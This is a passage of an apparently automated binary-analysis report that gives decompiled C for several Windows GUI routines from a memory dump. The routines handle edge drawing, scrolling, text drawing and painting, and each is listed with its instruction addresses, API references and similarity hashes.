									__eflags = _t257;
									continue;
								}
								__eflags = RectVisible(E00420704( *((intOrPtr*)( *_t240 + 0x208))),  &_v49);
								if(__eflags == 0) {
									goto L39;
								} else {
									_v17 = _a4;
									_t163 = E0045B5E0( *_t240, __eflags);
									__eflags = _t163;
									if(_t163 != 0) {
										_t236 =  *_t240;
										__eflags =  *((intOrPtr*)(_t236 + 0x22c)) - _v16;
										if( *((intOrPtr*)(_t236 + 0x22c)) == _v16) {
											_t238 =  *_t240;
											__eflags = _t257 -  *((intOrPtr*)(_t238 + 0x228));
											if(_t257 ==  *((intOrPtr*)(_t238 + 0x228))) {
												_t24 =  &_v17;
												 *_t24 = _v17 | 0x00000002;
												__eflags =  *_t24;
											}
										}
									}
									_t242 = _a24 - 0x80;
									_t166 = E0045A314(_t257, _a24 - 0x80, _v16);
									__eflags = _t166;
									if(_t166 != 0) {
										_t29 =  &_v17;
										 *_t29 = _v17 | 0x00000001;
										__eflags =  *_t29;
									}
									__eflags = _v17 & 0x00000002;
									if((_v17 & 0x00000002) == 0) {
										L14:
										_t167 =  *_t240;
										__eflags =  *((char*)(_t167 + 0x28c));
										if( *((char*)(_t167 + 0x28c)) != 0) {
											L16:
											_t260 =  *((intOrPtr*)( *_t240 + 0x208));
											E00420600( *((intOrPtr*)( *_t240 + 0x208)));
											__eflags = _v17 & 0x00000001;
											if(__eflags == 0) {
												L20:
												E0041FBEC( *((intOrPtr*)(_t260 + 0x14)), _t242, _a8, _t257, _t265, __eflags);
												L21:
												E00420284(_t260,  &_v49);
												L22:
												 *((intOrPtr*)( *((intOrPtr*)( *_t240)) + 0xd4))(_v17,  &_v49);
												_t180 =  *_t240;
												__eflags =  *((char*)(_t180 + 0x28c));
												if( *((char*)(_t180 + 0x28c)) != 0) {
													__eflags = _v17 & 0x00000004;
													if((_v17 & 0x00000004) != 0) {
														_t201 =  *_t240;
														__eflags =  *((char*)(_t201 + 0x1a5));
														if( *((char*)(_t201 + 0x1a5)) != 0) {
															_t202 = _a24;
															_t253 = _a24;
															__eflags =  *(_t202 - 0x84) |  *(_t253 - 0x88);
															if(( *(_t202 - 0x84) |  *(_t253 - 0x88)) != 0) {
																asm("movsd");
																asm("movsd");
																asm("movsd");
																asm("movsd");
																_t257 = _t257;
																_t205 = _a24;
																__eflags =  *(_t205 - 0x84) & 0x00000004;
																if(( *(_t205 - 0x84) & 0x00000004) != 0) {
																	_t206 = _a24;
																	__eflags =  *(_t206 - 0x84) & 0x00000008;
																	if(( *(_t206 - 0x84) & 0x00000008) == 0) {
																		_t88 =  &(_v65.bottom);
																		 *_t88 = _v65.bottom +  *((intOrPtr*)(_a24 - 0x40));
																		__eflags =  *_t88;
																	}
																} else {
																	_v65.right = _v65.right +  *((intOrPtr*)(_a24 - 0x70));
																}
																DrawEdge(E00420704( *((intOrPtr*)( *_t240 + 0x208))),  &_v65, 4,  *(_a24 - 0x84));
																DrawEdge(E00420704( *((intOrPtr*)( *_t240 + 0x208))),  &_v65, 4,  *(_a24 - 0x88));
															}
														}
													}
												}
												_t181 =  *_t240;
												__eflags =  *((char*)(_t181 + 0x28c));
												if( *((char*)(_t181 + 0x28c)) != 0) {
													_t182 =  *_t240;
													__eflags =  *(_t182 + 0x1c) & 0x00000010;
													if(( *(_t182 + 0x1c) & 0x00000010) == 0) {
														__eflags = _v17 & 0x00000002;
														if((_v17 & 0x00000002) != 0) {
															_t183 =  *_t240;
															_t252 =  *0x45c0e4; // 0x2400
															__eflags = _t252 - ( *(_t183 + 0x248) &  *0x45c0e4);
															if(_t252 != ( *(_t183 + 0x248) &  *0x45c0e4)) {
																__eflags =  *( *_t240 + 0x249) & 0x00000010;
																if(__eflags == 0) {
																	_t188 = E004037D8( *_t240, __eflags);
																	__eflags = _t188;
																	if(_t188 != 0) {
																		asm("movsd");
																		asm("movsd");
																		asm("movsd");
																		asm("movsd");
																		_t257 = _t257;
																		_v33.left = _v49.right;
																		_v33.right = _v49.left;
																		DrawFocusRect(E00420704( *((intOrPtr*)( *_t240 + 0x208))),  &_v33);
																	} else {
																		DrawFocusRect(E00420704( *((intOrPtr*)( *_t240 + 0x208))),  &_v49);
																	}
																}
															}
														}
													}
												}
												goto L39;
											}
											__eflags = _v17 & 0x00000002;
											if(__eflags == 0) {
												L19:
												E0041FBEC( *((intOrPtr*)(_t260 + 0x14)), _t242, 0x8000000d, _t257, _t265, __eflags);
												E0041F400( *((intOrPtr*)(_t260 + 0xc)), 0x8000000e);
												goto L21;
											}
											_t256 =  *0x45c0e0; // 0x0
											__eflags = _t256 - ( *( *_t240 + 0x248) &  *0x45c0dc);
											if(__eflags == 0) {
												goto L20;
											}
											goto L19;
										}
										_t232 =  *_t240;
										__eflags =  *(_t232 + 0x1c) & 0x00000010;
										if(( *(_t232 + 0x1c) & 0x00000010) == 0) {
											goto L22;
										}
										goto L16;
									}
									_t233 =  *_t240;
									__eflags =  *(_t233 + 0x249) & 0x00000004;
									if(( *(_t233 + 0x249) & 0x00000004) == 0) {
										goto L14;
									}
									_t234 =  *_t240;
									__eflags =  *((char*)(_t234 + 0x28d));
									if( *((char*)(_t234 + 0x28d)) == 0) {
										goto L14;
									}
									_t235 =  *_t240;
									__eflags =  *(_t235 + 0x1c) & 0x00000010;
									if(( *(_t235 + 0x1c) & 0x00000010) == 0) {
										goto L39;
									}
									goto L14;
								}
							}
							break;
						}
						_v49.top =  *((intOrPtr*)(_a24 - 0x40)) + _v49.bottom;
						_t130 =  &_v16;
						 *_t130 = _v16 + 1;
						__eflags =  *_t130;
						continue;
					}
					break;
				}
				return _t138;
			}

0x0045bdb9
0x0045bdbc
0x0045bdc2
0x0045bdc5
0x0045bdcb
0x0045c0b9
0x0045c0b9
0x0045c0bf
0x00000000
0x00000000
0x0045c0c3
0x0045c0cc
0x0045bdd3
0x0045bdd9
0x0045bde9
0x0045c094
0x0045c097
0x0045c09a
0x00000000
0x00000000
0x0045c09c
0x0045c09e
0x0045c0a4
0x0045bdfd
0x0045be03
0x0045be06
0x0045c087
0x0045c090
0x0045c093
0x0045c093
0x00000000
0x0045c093
0x0045be23
0x0045be25
0x00000000
0x0045be2b
0x0045be2e
0x0045be33
0x0045be38
0x0045be3a
0x0045be3c
0x0045be44
0x0045be47
0x0045be49
0x0045be4b
0x0045be51
0x0045be53
0x0045be53
0x0045be53
0x0045be53
0x0045be51
0x0045be47
0x0045be5a
0x0045be62
0x0045be67
0x0045be69
0x0045be6b
0x0045be6b
0x0045be6b
0x0045be6b
0x0045be6f
0x0045be73
0x0045be97
0x0045be97
0x0045be99
0x0045bea0
0x0045beaa
0x0045beac
0x0045beb9
0x0045bebe
0x0045bec2
0x0045bf02
0x0045bf08
0x0045bf0d
0x0045bf12
0x0045bf17
0x0045bf28
0x0045bf2e
0x0045bf30
0x0045bf37
0x0045bf3d
0x0045bf41
0x0045bf47
0x0045bf49
0x0045bf50
0x0045bf56
0x0045bf5f
0x0045bf62
0x0045bf68
0x0045bf71
0x0045bf72
0x0045bf73
0x0045bf74
0x0045bf75
0x0045bf76
0x0045bf79
0x0045bf80
0x0045bf8d
0x0045bf90
0x0045bf97
0x0045bf9f
0x0045bf9f
0x0045bf9f
0x0045bf9f
0x0045bf82
0x0045bf88
0x0045bf88
0x0045bfc0
0x0045bfe3
0x0045bfe3
0x0045bf68
0x0045bf50
0x0045bf41
0x0045bfe8
0x0045bfea
0x0045bff1
0x0045bff7
0x0045bff9
0x0045bffd
0x0045c003
0x0045c007
0x0045c009
0x0045c019
0x0045c020
0x0045c023
0x0045c027
0x0045c02e
0x0045c036
0x0045c03b
0x0045c03d
0x0045c05f
0x0045c060
0x0045c061
0x0045c062
0x0045c063
0x0045c067
0x0045c06d
0x0045c082
0x0045c03f
0x0045c051
0x0045c051
0x0045c03d
0x0045c02e
0x0045c023
0x0045c007
0x0045bffd
0x00000000
0x0045bff1
0x0045bec4
0x0045bec8
0x0045bee6
0x0045beee
0x0045befb
0x00000000
0x0045befb
0x0045beda
0x0045bee1
0x0045bee4
0x00000000
0x00000000
0x00000000
0x0045bee4
0x0045bea2
0x0045bea4
0x0045bea8
0x00000000
0x00000000
0x00000000
0x0045bea8
0x0045be75
0x0045be77
0x0045be7e
0x00000000
0x00000000
0x0045be80
0x0045be82
0x0045be89
0x00000000
0x00000000
0x0045be8b
0x0045be8d
0x0045be91
0x00000000
0x00000000
0x00000000
0x0045be91
0x0045be25
0x00000000
0x0045c0a4
0x0045c0b3
0x0045c0b6
0x0045c0b6
0x0045c0b6
0x00000000
0x0045c0b6
0x00000000
0x0045c0cc
0x0045c0d8

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e544722e1dd04e34dfc6d722b3ddc66385eea87416ddf4a68a1f8d1b7a1311f6
Instruction ID: c0180a7917cf77d7b63928f836e05d9b0d01cb765915a8b5c76311820d85f327
Opcode Fuzzy Hash: e544722e1dd04e34dfc6d722b3ddc66385eea87416ddf4a68a1f8d1b7a1311f6
Instruction Fuzzy Hash: 43B1F975A002589FCB10DF9CC489BEEB7F5AF09305F0480A6ED44AB3A6C778AC49CB55

Uniqueness

Uniqueness Score: -1.00%

Function 0044E5EC, Relevance: 7.7, APIs: 5, Instructions: 171
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E0044E5EC(intOrPtr __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				signed char _t92;
				int _t98;
				int _t100;
				intOrPtr _t117;
				int _t122;
				intOrPtr _t155;
				void* _t164;
				signed char _t180;
				intOrPtr _t182;
				intOrPtr _t194;
				int _t199;
				intOrPtr _t203;
				void* _t204;

				_t204 = __eflags;
				_t196 = __edi;
				_t202 = _t203;
				_v8 = __eax;
				E00438BE4(_v8);
				_push(_t203);
				_push(0x44e842);
				_push( *[fs:edx]);
				 *[fs:edx] = _t203;
				 *(_v8 + 0x268) = 0;
				 *(_v8 + 0x26c) = 0;
				 *(_v8 + 0x270) = 0;
				_t164 = 0;
				_t92 =  *0x492709; // 0x0
				 *(_v8 + 0x234) = _t92 ^ 0x00000001;
				E00438354(_v8, 0, __edx, _t204);
				if( *(_v8 + 0x25c) == 0 ||  *(_v8 + 0x270) <= 0) {
					L12:
					_t98 =  *(_v8 + 0x268);
					_t213 = _t98;
					if(_t98 > 0) {
						E00435590(_v8, _t98, _t196, _t213);
					}
					_t100 =  *(_v8 + 0x26c);
					_t214 = _t100;
					if(_t100 > 0) {
						E004355D4(_v8, _t100, _t196, _t214);
					}
					_t180 =  *0x44e850; // 0x0
					 *(_v8 + 0x98) = _t180;
					_t215 = _t164;
					if(_t164 == 0) {
						E0044DB54(_v8, 1, 1);
						E0043BCF8(_v8, 1, 1, _t215);
					}
					E00436D28(_v8, 0, 0xb03d, 0);
					_pop(_t182);
					 *[fs:eax] = _t182;
					_push(0x44e849);
					return E00438BEC(_v8);
				} else {
					if(( *(_v8 + 0x98) & 0x00000010) != 0) {
						_t194 =  *0x492c08; // 0x241094c
						if( *(_v8 + 0x25c) !=  *((intOrPtr*)(_t194 + 0x40))) {
							_t155 =  *0x492c08; // 0x241094c
							E0041F5E8( *((intOrPtr*)(_v8 + 0x68)), MulDiv(E0041F5E0( *((intOrPtr*)(_v8 + 0x68))),  *(_t155 + 0x40),  *(_v8 + 0x25c)), __edi, _t202);
						}
					}
					_t117 =  *0x492c08; // 0x241094c
					 *(_v8 + 0x25c) =  *(_t117 + 0x40);
					_t199 = E0044E974(_v8);
					_t122 =  *(_v8 + 0x270);
					_t209 = _t199 - _t122;
					if(_t199 != _t122) {
						_t164 = 1;
						E0044DB54(_v8, _t122, _t199);
						E0043BCF8(_v8,  *(_v8 + 0x270), _t199, _t209);
						if(( *(_v8 + 0x98) & 0x00000004) != 0) {
							 *(_v8 + 0x268) = MulDiv( *(_v8 + 0x268), _t199,  *(_v8 + 0x270));
						}
						if(( *(_v8 + 0x98) & 0x00000008) != 0) {
							 *(_v8 + 0x26c) = MulDiv( *(_v8 + 0x26c), _t199,  *(_v8 + 0x270));
						}
						if(( *(_v8 + 0x98) & 0x00000020) != 0) {
							 *(_v8 + 0x1fa) = MulDiv( *(_v8 + 0x1fa), _t199,  *(_v8 + 0x270));
							 *(_v8 + 0x1fe) = MulDiv( *(_v8 + 0x1fe), _t199,  *(_v8 + 0x270));
						}
					}
					goto L12;
				}
			}

0x0044e5ec
0x0044e5ec
0x0044e5ed
0x0044e5f4
0x0044e5fa
0x0044e601
0x0044e602
0x0044e607
0x0044e60a
0x0044e612
0x0044e61d
0x0044e628
0x0044e62e
0x0044e630
0x0044e63a
0x0044e645
0x0044e654
0x0044e7b6
0x0044e7b9
0x0044e7bf
0x0044e7c1
0x0044e7c8
0x0044e7c8
0x0044e7d0
0x0044e7d6
0x0044e7d8
0x0044e7df
0x0044e7df
0x0044e7e7
0x0044e7ed
0x0044e7f3
0x0044e7f5
0x0044e804
0x0044e816
0x0044e816
0x0044e827
0x0044e82e
0x0044e831
0x0044e834
0x0044e841
0x0044e66a
0x0044e674
0x0044e67f
0x0044e688
0x0044e694
0x0044e6b4
0x0044e6b4
0x0044e688
0x0044e6b9
0x0044e6c4
0x0044e6d2
0x0044e6d7
0x0044e6dd
0x0044e6df
0x0044e6e5
0x0044e6ee
0x0044e701
0x0044e710
0x0044e72f
0x0044e72f
0x0044e73f
0x0044e75e
0x0044e75e
0x0044e76e
0x0044e78d
0x0044e7b0
0x0044e7b0
0x0044e76e
0x00000000
0x0044e6df

APIs

MulDiv.KERNEL32(00000000,?,00000000), ref: 0044E6AB
MulDiv.KERNEL32(?,00000000,00000000), ref: 0044E727
MulDiv.KERNEL32(?,00000000,00000000), ref: 0044E756
MulDiv.KERNEL32(?,00000000,00000000), ref: 0044E785
MulDiv.KERNEL32(?,00000000,00000000), ref: 0044E7A8

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b397a4cf440d93dc7ae4467d2d86ec317741e6a73e626e2f5f43d2d9886ef40e
Instruction ID: 6960c3494087b3200d96737c44c3ee892bb725ce984e2307a56490d00ad7d24d
Opcode Fuzzy Hash: b397a4cf440d93dc7ae4467d2d86ec317741e6a73e626e2f5f43d2d9886ef40e
Instruction Fuzzy Hash: C271C734B04144EFDB00DBA9C589AA9B7F5BF49304F2541F6E408EB362DB35AE45DB44

Uniqueness

Uniqueness Score: -1.00%

Function 0045DFCC, Relevance: 7.7, APIs: 5, Instructions: 168
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E0045DFCC(void* __eax, int __ecx, signed int __edx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				struct tagRECT _v28;
				char _v44;
				int _t90;
				void* _t109;
				void* _t125;
				void* _t131;
				intOrPtr _t142;
				int _t143;

				_t143 = __ecx;
				_v8 = __edx;
				_t125 = __eax;
				_t142 = _a4;
				_v12 = 2;
				if( *((char*)(__eax + 0x28c)) == 0) {
					_v12 = _v12 | 0x00000004;
				}
				_t147 = _t143;
				if(_t143 != 0) {
					__eflags = _v8;
					if(_v8 != 0) {
						_t29 = _t142 + 0x34; // 0xe89c933
						_t31 = _t142 + 0xc; // 0x895653ec
						E00412B80( *_t31, 0,  &_v28,  *_t29);
						ScrollWindowEx(E0043C1F4(_t125), _v8, 0,  &_v28,  &_v28, 0, 0, _v12);
						_t37 = _t142 + 0x3c; // 0x55894233
						_t39 = _t142 + 4; // 0x55c35b5e
						_t40 = _t142 + 0x34; // 0xe89c933
						__eflags = 0;
						E00412B80( *_t39,  *_t40,  &_v28,  *_t37);
						ScrollWindowEx(E0043C1F4(_t125), 0, _t143,  &_v28,  &_v28, 0, 0, _v12);
						_t44 = _t142 + 0x3c; // 0x55894233
						_t46 = _t142 + 0xc; // 0x895653ec
						_t47 = _t142 + 0x34; // 0xe89c933
						E00412B80( *_t46,  *_t47,  &_v28,  *_t44);
						_t90 = ScrollWindowEx(E0043C1F4(_t125), _v8, _t143,  &_v28,  &_v28, 0, 0, _v12);
					} else {
						_t22 = _t142 + 0x3c; // 0x55894233
						_t24 = _t142 + 0xc; // 0x895653ec
						_t25 = _t142 + 0x34; // 0xe89c933
						E00412B80( *_t24,  *_t25,  &_v28,  *_t22);
						_t90 = ScrollWindowEx(E0043C1F4(_t125), 0, _t143,  &_v28,  &_v28, 0, 0, _v12);
					}
				} else {
					if(E004037D8(_t125, _t147) != 0) {
						_t11 = _t142 + 0x3c; // 0x55894233
						_push( *_t11);
						_push( &_v28);
						_t109 = E00435578(_t125);
						_t13 = _t142 + 4; // 0x55c35b5e
						_push(_t109 -  *_t13);
						E00435578(_t125);
						__eflags = 0;
						_pop(_t131);
						E00412B80(_t131, 0);
						_v8 =  ~_v8;
					} else {
						_t7 = _t142 + 0x3c; // 0x55894233
						_t9 = _t142 + 0xc; // 0x895653ec
						E00412B80( *_t9, 0,  &_v28,  *_t7);
					}
					_t90 = ScrollWindowEx(E0043C1F4(_t125), _v8, 0,  &_v28,  &_v28, 0, 0, _v12);
				}
				_t149 =  *(_t125 + 0x249) & 0x00000010;
				if(( *(_t125 + 0x249) & 0x00000010) == 0) {
					return _t90;
				} else {
					E0045F7D8(_t125,  &_v44);
					return E0045D6C8(_t125,  &_v44, _t149);
				}
			}

0x0045dfd5
0x0045dfd7
0x0045dfda
0x0045dfdc
0x0045dfdf
0x0045dfed
0x0045dfef
0x0045dfef
0x0045dff3
0x0045dff5
0x0045e06d
0x0045e071
0x0045e0ad
0x0045e0b5
0x0045e0bd
0x0045e0e0
0x0045e0e5
0x0045e0ed
0x0045e0f0
0x0045e0f3
0x0045e0f5
0x0045e115
0x0045e11a
0x0045e122
0x0045e125
0x0045e12b
0x0045e14d
0x0045e073
0x0045e073
0x0045e07b
0x0045e07e
0x0045e083
0x0045e0a3
0x0045e0a3
0x0045dff7
0x0045e004
0x0045e01d
0x0045e020
0x0045e024
0x0045e027
0x0045e02c
0x0045e02f
0x0045e032
0x0045e03a
0x0045e03c
0x0045e03d
0x0045e042
0x0045e006
0x0045e006
0x0045e00e
0x0045e016
0x0045e016
0x0045e063
0x0045e063
0x0045e152
0x0045e159
0x0045e175
0x0045e15b
0x0045e160
0x00000000
0x0045e16a

APIs

ScrollWindowEx.USER32 ref: 0045E063
ScrollWindowEx.USER32 ref: 0045E0A3
ScrollWindowEx.USER32 ref: 0045E0E0
ScrollWindowEx.USER32 ref: 0045E115
ScrollWindowEx.USER32 ref: 0045E14D

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: ScrollWindow
String ID:
API String ID: 2126015319-0
Opcode ID: 17c667a3771b4c0538ed94ff692a567cebbbf67053029177f03cb584ba584c94
Instruction ID: fea2088d03b77c64c6fd9cee4769f1218f6eafd672669c05cb62bc988ca7fb8f
Opcode Fuzzy Hash: 17c667a3771b4c0538ed94ff692a567cebbbf67053029177f03cb584ba584c94
Instruction Fuzzy Hash: D7510072A00509BBDB00DE95CD82FDBB7ACAF08314F405526B605E7682CB74F955CBE4

Uniqueness

Uniqueness Score: -1.00%

Function 00445994, Relevance: 7.7, APIs: 5, Instructions: 162
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00445994(void* __eax, void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, int _a4, char _a8, struct tagRECT* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v16;
				struct tagRECT _v32;
				void* _t53;
				int _t63;
				CHAR* _t65;
				void* _t76;
				void* _t78;
				int _t89;
				CHAR* _t91;
				int _t117;
				intOrPtr _t127;
				void* _t139;
				void* _t144;
				char _t153;

				_t120 = __ecx;
				_t143 = _t144;
				_v16 = 0;
				_v12 = __ecx;
				_v8 = __edx;
				_t139 = __eax;
				_t117 = _a4;
				_push(_t144);
				_push(0x445b78);
				_push( *[fs:eax]);
				 *[fs:eax] = _t144 + 0xffffffe4;
				_t53 = E004477F8(__eax);
				_t135 = _t53;
				if(_t53 != 0 && E00448E34(_t135) != 0) {
					if((_t117 & 0x00000000) != 0) {
						__eflags = (_t117 & 0x00000002) - 2;
						if((_t117 & 0x00000002) == 2) {
							_t117 = _t117 & 0xfffffffd;
							__eflags = _t117;
						}
					} else {
						_t117 = _t117 & 0xffffffff | 0x00000002;
					}
					_t117 = _t117 | 0x00020000;
				}
				E004043E0( &_v16, _v12);
				if((_t117 & 0x00000004) == 0) {
					L12:
					E00404744(_v16, 0x445b9c);
					if(_t153 != 0) {
						E0041FD08( *((intOrPtr*)(_v8 + 0x14)), _t120, 1, _t135, _t143, __eflags);
						__eflags =  *((char*)(_t139 + 0x3a));
						if( *((char*)(_t139 + 0x3a)) != 0) {
							_t136 =  *((intOrPtr*)(_v8 + 0xc));
							__eflags = E0041F6C0( *((intOrPtr*)(_v8 + 0xc))) |  *0x445ba0;
							E0041F6CC( *((intOrPtr*)(_v8 + 0xc)), E0041F6C0( *((intOrPtr*)(_v8 + 0xc))) |  *0x445ba0, _t136, _t139, _t143);
						}
						__eflags =  *((char*)(_t139 + 0x39));
						if( *((char*)(_t139 + 0x39)) != 0) {
							L24:
							_t63 = E00404600(_v16);
							_t65 = E004047F8(_v16);
							DrawTextA(E00420704(_v8), _t65, _t63, _a12, _t117);
							L25:
							_pop(_t127);
							 *[fs:eax] = _t127;
							_push(0x445b7f);
							return E00404348( &_v16);
						} else {
							__eflags = _a8;
							if(_a8 == 0) {
								OffsetRect(_a12, 1, 1);
								E0041F400( *((intOrPtr*)(_v8 + 0xc)), 0x80000014);
								_t89 = E00404600(_v16);
								_t91 = E004047F8(_v16);
								DrawTextA(E00420704(_v8), _t91, _t89, _a12, _t117);
								OffsetRect(_a12, 0xffffffff, 0xffffffff);
							}
							__eflags = _a8;
							if(_a8 == 0) {
								L23:
								E0041F400( *((intOrPtr*)(_v8 + 0xc)), 0x80000010);
							} else {
								_t76 = E0041EF40(0x8000000d);
								_t78 = E0041EF40(0x80000010);
								__eflags = _t76 - _t78;
								if(_t76 != _t78) {
									goto L23;
								}
								E0041F400( *((intOrPtr*)(_v8 + 0xc)), 0x80000014);
							}
							goto L24;
						}
					}
					if((_t117 & 0x00000004) == 0) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_v32.top = _v32.top + 4;
						DrawEdge(E00420704(_v8),  &_v32, 6, 2);
					}
					goto L25;
				} else {
					if(_v16 == 0) {
						L11:
						E00404608( &_v16, 0x445b90);
						goto L12;
					}
					if( *_v16 != 0x26) {
						goto L12;
					}
					_t153 =  *((char*)(_v16 + 1));
					if(_t153 != 0) {
						goto L12;
					}
					goto L11;
				}
			}

0x00445994
0x00445995
0x0044599f
0x004459a2
0x004459a5
0x004459a8
0x004459aa
0x004459af
0x004459b0
0x004459b5
0x004459b8
0x004459bd
0x004459c2
0x004459c6
0x004459d6
0x004459e5
0x004459e8
0x004459ed
0x004459ed
0x004459ed
0x004459d8
0x004459db
0x004459db
0x004459f0
0x004459f0
0x004459fc
0x00445a04
0x00445a2a
0x00445a32
0x00445a37
0x00445a75
0x00445a7a
0x00445a7e
0x00445a83
0x00445a8f
0x00445a97
0x00445a97
0x00445a9c
0x00445aa0
0x00445b3d
0x00445b45
0x00445b4e
0x00445b5d
0x00445b62
0x00445b64
0x00445b67
0x00445b6a
0x00445b77
0x00445aa6
0x00445aa6
0x00445aaa
0x00445ab4
0x00445ac4
0x00445ad1
0x00445ada
0x00445ae9
0x00445af6
0x00445af6
0x00445afb
0x00445aff
0x00445b2d
0x00445b38
0x00445b01
0x00445b06
0x00445b12
0x00445b17
0x00445b19
0x00000000
0x00000000
0x00445b26
0x00445b26
0x00000000
0x00445aff
0x00445aa0
0x00445a3c
0x00445a4a
0x00445a4b
0x00445a4c
0x00445a4d
0x00445a4e
0x00445a63
0x00445a63
0x00000000
0x00445a06
0x00445a0a
0x00445a1d
0x00445a25
0x00000000
0x00445a25
0x00445a12
0x00000000
0x00000000
0x00445a17
0x00445a1b
0x00000000
0x00000000
0x00000000
0x00445a1b

APIs

DrawEdge.USER32(00000000,?,00000006,00000002), ref: 00445A63
OffsetRect.USER32(?,00000001,00000001), ref: 00445AB4
DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 00445AE9
OffsetRect.USER32(?,000000FF,000000FF), ref: 00445AF6
DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 00445B5D

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Draw$OffsetRectText$Edge
String ID:
API String ID: 3610532707-0
Opcode ID: 8b7887d2222e676a413128fbd1c7e36af114313dfb6054b3d9e2a2fbc7481104
Instruction ID: cdbe363873c02c5fdcbc5fb3478ee405bad097bcf4dd95d0f07e6530c65ebb84
Opcode Fuzzy Hash: 8b7887d2222e676a413128fbd1c7e36af114313dfb6054b3d9e2a2fbc7481104
Instruction Fuzzy Hash: 92518370A00648AFEF10EBA9C881B9FB7E5AF45324F14466AF914E7393D73CAD418719

Uniqueness

Uniqueness Score: -1.00%

Function 00439F44, Relevance: 7.6, APIs: 5, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00439F44(intOrPtr* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				intOrPtr _v12;
				int _v16;
				int _v20;
				struct tagPAINTSTRUCT _v84;
				intOrPtr _t55;
				void* _t64;
				struct HDC__* _t75;
				intOrPtr _t84;
				void* _t95;
				void* _t96;
				void* _t98;
				void* _t100;
				void* _t101;
				intOrPtr _t102;

				_t100 = _t101;
				_t102 = _t101 + 0xffffffb0;
				_v12 = __edx;
				_v8 = __eax;
				_t75 =  *(_v12 + 4);
				if(_t75 == 0) {
					_t75 = BeginPaint(E0043C1F4(_v8),  &_v84);
				}
				_push(_t100);
				_push(0x43a064);
				_push( *[fs:edx]);
				 *[fs:edx] = _t102;
				if( *((intOrPtr*)(_v8 + 0x198)) != 0) {
					_v20 = SaveDC(_t75);
					_v16 = 2;
					_t95 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x198)) + 8)) - 1;
					if(_t95 >= 0) {
						_t96 = _t95 + 1;
						_t98 = 0;
						do {
							_t64 = E004141BC( *((intOrPtr*)(_v8 + 0x198)), _t98);
							if( *((char*)(_t64 + 0x57)) != 0 || ( *(_t64 + 0x1c) & 0x00000010) != 0 && ( *(_t64 + 0x51) & 0x00000004) == 0) {
								if(( *(_t64 + 0x50) & 0x00000040) == 0) {
									goto L11;
								} else {
									_v16 = ExcludeClipRect(_t75,  *(_t64 + 0x40),  *(_t64 + 0x44),  *(_t64 + 0x40) +  *((intOrPtr*)(_t64 + 0x48)),  *(_t64 + 0x44) +  *((intOrPtr*)(_t64 + 0x4c)));
									if(_v16 != 1) {
										goto L11;
									}
								}
							} else {
								goto L11;
							}
							goto L12;
							L11:
							_t98 = _t98 + 1;
							_t96 = _t96 - 1;
						} while (_t96 != 0);
					}
					L12:
					if(_v16 != 1) {
						 *((intOrPtr*)( *_v8 + 0xb8))();
					}
					RestoreDC(_t75, _v20);
				} else {
					 *((intOrPtr*)( *_v8 + 0xb8))();
				}
				E0043A0A0(_v8, 0, _t75);
				_pop(_t84);
				 *[fs:eax] = _t84;
				_push(0x43a06b);
				_t55 = _v12;
				if( *((intOrPtr*)(_t55 + 4)) == 0) {
					return EndPaint(E0043C1F4(_v8),  &_v84);
				}
				return _t55;
			}

0x00439f45
0x00439f47
0x00439f4d
0x00439f50
0x00439f56
0x00439f5b
0x00439f6f
0x00439f6f
0x00439f73
0x00439f74
0x00439f79
0x00439f7c
